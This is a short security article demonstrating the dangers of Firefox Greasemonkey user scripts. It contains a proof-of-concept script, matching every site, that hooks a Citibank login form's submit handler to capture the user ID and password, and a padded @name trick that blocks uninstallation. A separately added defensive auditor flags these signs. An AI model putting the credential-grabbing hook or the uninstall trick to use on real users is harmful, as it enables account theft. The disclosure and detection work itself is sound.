---------------------------------------------------
Vision of danger: The Firefox Greasemonkey
---------------------------------------------------

written by Piotr Bania [___ http://pb.specialised.info ___]
Original location: http://pb.specialised.info/all/articles/monkey.txt

-----------------
0. DISCLAIMER
-----------------

The author takes no responsibility for any actions taken with the information or code provided here. The copyright for any material created by the author is reserved. Any duplication of the code or text provided here in electronic or printed publications (including compiled code) is not permitted without the author's agreement.

-----------------
I. INTRODUCTION
-----------------

Greasemonkey is a free and, nowadays, very popular extension for the Firefox browser. It lets users add DHTML scripts to any web site and change its original behaviour. It's a nice feature, nice for good and bad guys alike... This short paper was written to show what can happen if a user runs a "bad" script; the idea is to show the danger itself.

-----------------
II. BAD SCRIPTS
-----------------

A) MAKING AN "UNABLE TO UNINSTALL" SCRIPT

A standard script usually starts with a special header (metadata tags) like this one:

--------// SNIP //--------
// ==UserScript==
// @name Say Hello!
// @namespace http://youngpup.net/userscripts
// @description Greets the world
// @include http://google.com/*
// @include http://www.google.com/*
// @exclude http://gmail.google.com/*
// ==/UserScript==
--------// SNIP //--------

This information is used when installing, running and uninstalling Greasemonkey scripts. A script with a specially generated @name metadata tag cannot be uninstalled automatically from Firefox (the user must delete the file by hand). Here is a sample "bad" @name tag:

--------// SNIP //--------
// ==UserScript==
// @name Im a script <5000*SPACE_CHAR_:])
// ...
--------// SNIP //--------

During script uninstallation the window resizes and the only thing the user can do is close it.
If the user wants to delete the script he must do it manually, deleting the file from the "{firefox profile dir}\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}\chrome\greasemonkey\content\scripts\" directory.

B) SPYING ON THE CITIBANK LOGIN PAGE

A potential attacker can also write a script which steals data, as demonstrated below. There are plenty of other ideas; here we assume a scenario in which the attacker wants to grab a CITIBANK user's LOGIN and PASSWORD.

Original website: https://cib.ibanking-services.com/cib/login.jsp?FIORG=775&FIFID=125106986&id=1449852460

(SPYER.user.js)

--------// SNIP //--------
// ==UserScript==
// @name Super Spyer :) - (c) Piotr Bania
// @namespace http://pb.specialised.info
// @description Shows potential risk of Firefox scripting.
// @include *
// ==/UserScript==

// We assume that the form used by Citibank is named "login", the login textbox is named
// "userid" and the password box is named "password"; look at the CITIBANK page source.
// Citibank is using an "onsubmit" routine, so we must execute it together with ours.
(function() {
    var old_ons = document.login.onsubmit.toString(); // grab the old routine's source
    var new_ons = "spy();" + "\r" + old_ons.substring(old_ons.indexOf("{") + 1, old_ons.lastIndexOf("}") - 1);
    document.login.onsubmit = new Function(new_ons);
})();

function spy() {
    alert("I have spyed you!!!\n\r\n\r\n\r-------------\n\rLOGIN: " + document.login.userid.value + "\n PASSWORD: " + document.login.password.value + "\n\r-------------\n\r\n\r\n\rhttp://pb.specialised.info");
}
--------// SNIP //--------

Such stolen information can then be transferred to the attacker's servers, email accounts, etc. There are many types and variations of this scenario.

----------------------
III. FINAL THOUGHTS
----------------------

Using Greasemonkey can be fun and also dangerous; everything depends on the level of user knowledge...
I want to end this short article with words from Aaron Boodman (author of Greasemonkey):

"All I can say is that just like any other software, you should think a tiny bit before installing a user script... Make sure the author is someone you trust, or at least in a social network you trust."

Peace.
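Added example (not part of Piotr Bania's article, nor Greasemonkey's own code): a defender-side audit of a user script before installing it, checking for the warning signs section II describes. The padding threshold and the catch-all @include patterns are assumptions, and the sample scripts are constructed.

```javascript
// Parse the ==UserScript== block and report the signs from section II:
// an @name padded with a long run of whitespace (the uninstall-dialog trick),
// an @include that matches every site (banking logins included), and a body
// that replaces a form's onsubmit handler via new Function.
const PADDING_RUN = /\s{16,}/;                    // assumption: 16+ spaces is padding
const CATCH_ALL = new Set(['*', 'http://*', 'https://*', '*://*/*']); // assumed patterns

function parseUserScriptHeader(src) {
  const m = src.match(/\/\/ ==UserScript==\r?\n([\s\S]*?)\/\/ ==\/UserScript==/);
  if (!m) return null;
  const meta = {};
  for (const line of m[1].split(/\r?\n/)) {
    const t = line.match(/^\/\/ ?@(\w+) ?(.*)$/);  // keep the raw value: padding matters
    if (!t) continue;
    (meta[t[1]] = meta[t[1]] || []).push(t[2]);
  }
  return meta;
}

function auditUserScript(src) {
  const findings = [];
  const meta = parseUserScriptHeader(src);
  if (!meta) return ['missing or malformed ==UserScript== block'];
  for (const name of meta.name || []) {
    if (PADDING_RUN.test(name)) findings.push('padded @name (may break uninstall dialog)');
  }
  for (const inc of meta.include || []) {
    if (CATCH_ALL.has(inc.trim())) findings.push(`catch-all @include "${inc.trim()}"`);
  }
  const body = src.slice(src.indexOf('==/UserScript=='));   // everything after the header
  if (/\.onsubmit\s*=/.test(body) && /new Function\(/.test(body)) {
    findings.push('rewrites a form onsubmit handler with new Function');
  }
  return findings;
}

// Constructed samples: a harmless header like "Say Hello!", and a suspicious one
// that combines the padded @name, the catch-all @include and the onsubmit rewrite.
const BENIGN = '// ==UserScript==\n// @name Say Hello!\n// @include http://www.google.com/*\n// ==/UserScript==\nalert("hello");';
const SUSPICIOUS = '// ==UserScript==\n// @name Im a script' + ' '.repeat(5000) + ':])\n// @include *\n// ==/UserScript==\ndocument.login.onsubmit = new Function("/* hijacked */");';

console.log(auditUserScript(BENIGN));      // []
console.log(auditUserScript(SUSPICIOUS));  // three findings
```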